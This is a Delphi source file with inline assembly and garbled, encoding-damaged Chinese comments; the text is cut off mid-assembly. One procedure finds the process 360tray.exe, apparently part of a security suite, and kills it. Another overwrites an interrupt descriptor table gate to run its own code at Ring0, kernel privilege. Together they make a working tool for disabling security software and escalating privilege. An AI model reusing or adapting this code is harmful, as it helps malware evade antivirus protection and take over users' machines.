Delphi ǶÈë»ã±à ½øRing0 360tray.exe

unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, TlHelp32;
type
TForm1 = class(TForm)
Button1: TButton;
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
procedure exit360;
procedure Ring0ToRun; stdcall;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure exit360;
var
id:Cardinal;
sn:THandle;
boo:Boolean;
lpp:TProcessEntry32;
phand:HWND;
begin
sn:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
lpp.dwSize:=SizeOf(lpp);
try
boo:=Process32First(sn,lpp);
while boo do
begin
if lpp.szExeFile = '360tray.exe' then
begin
//Result:=lpp.szExeFile;
id:=lpp.th32ProcessID;
phand:=OpenProcess(PROCESS_ALL_ACCESS,False,id);
GetWindowThreadProcessId(phand,id);
TerminateProcess(phand,ExitCode);
Break;
end;
boo:=Process32Next(sn,lpp);
end;
except
end;
end;
procedure Ring0ToRun; stdcall;
const
ExceptionUsed = $03; // ÖжϺÅ,Ò²¿ÉÒÔÓÃÆäËûµÄÖжϺţ¬Èç$05µÈ
var
IDT:array [0..5] of byte; //±£´æÖжÏÃèÊö·û±í£¬6×Ö½Ú
lpOldGate : DWORD; // ±£´æ¾ÉµÄÖжÏÏòÁ¿£¬8¸ö×Ö½Ú
begin
asm
sidt IDT //¶ÁÈëÖжÏÃèÊö·û±íÖÁIDtÖÐ
mov ebx, dword ptr [IDT+2] //IDT¹²6×Ö½Ú£¬µÚ2~5×Ö½ÚÊÇÖжÏÃèÊö·û±íµÄ»ùµØÖ·£¬»ùµØÖ·´æÈëebxÖÐ
add ebx, 8*ExceptionUsed //¼ÓÉÏ8x3¸ö×Ö½Ú£¬ÒòΪÿ¸öÖжÏÏòÁ¿Õ¼ÓÃ8×Ö½Ú£¬
cli //¹ØÖжϣ¬ÏÂÃæµÄ´úÂëÊǹؼü´úÂ룬²»ÔÊÐí´ò¶Ï
mov dx, word ptr [ebx+6] //È¡ÖжÏÏòÁ¿µÄ6£¬7×Ö½Ú
shl edx, 16d //×óÒÆ16룬ÖжÏÏòÁ¿µÄ6£¬7×Ö½Ú´æÈëedxµÄ¸ß32λ
mov dx, word ptr [ebx] //È¡ÖжÏÏòÁ¿µÄ0£¬1×Ö½Ú£¬´æÈëedxµÍ32λ
mov [lpOldGate], edx //±£´æÖжÏÏòÁ¿ÖÁlpoldgateÖÐ
mov eax, offset @@Ring0Code //ÐÞ¸ÄÏòÁ¿£¬Ö¸ÏòRing0¼¶´úÂë¶Î
mov word ptr [ebx], ax
shr eax, 16d
mov word ptr [ebx+6], ax
int ExceptionUsed // ·¢ÉúÖжϣ¬×Ô¶¯ÒÔring0Ö´ÐÐ@@Ring0Co